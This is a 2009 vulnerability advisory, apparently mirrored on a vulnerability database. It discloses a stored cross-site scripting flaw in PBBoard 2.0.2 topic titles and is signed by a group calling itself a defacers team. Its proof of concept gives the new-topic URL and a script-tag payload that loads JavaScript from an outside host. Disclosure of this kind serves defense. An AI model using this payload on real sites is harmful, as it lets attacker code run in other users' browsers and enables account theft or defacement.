Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22565
HistoryOct 06, 2009 - 12:00 a.m.

[Sec-Area Advisory]PBBoard <=2.0.2 - XSS in Topic

2009-10-0600:00:00
vulners.com
17

[Sec-Area Advisory]pbboard <=2.0.2 - XSS in Topic
Details

Product: PHP <= PBBoard
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.pbboard.com

Credits

Discovered by: rUnViRuS
site: http://www.sec-area.com

Affected Products:

test on PBBoard 2.0.2
maybe work under 2.0.2

Original Advisory:

http://www.sec-area.com/?p=141

More Details

  1. Cross-site scripting

enable malicious attackers to inject client-side script into web pages

Proof of concept:
Make a new topic in In the title Write some Javascript/HTML
Back to forums
You will find the code works

Proof of concept code:
go to : http://www.pbboard.com/forums/index.php?page=new_topic&amp;index=1&amp;id=[Section id ]
then
In the title Write some Javascript/HTML
like : <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Back to forums
You will find the code works


[W]orld [D]efacers [T]eam
http://www.Sec-area.com